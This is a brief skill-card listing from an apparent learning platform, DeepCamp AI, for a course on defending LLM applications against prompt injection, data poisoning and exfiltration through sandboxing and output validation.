AI Security
Understand and defend against prompt injection, data poisoning, and LLM exploits.
0%
Confidence · no data yet
After this skill you can…
- Identify and patch prompt injection vulnerabilities
- Test LLM apps for data exfiltration risks
- Apply sandboxing and output validation
DeepCamp AI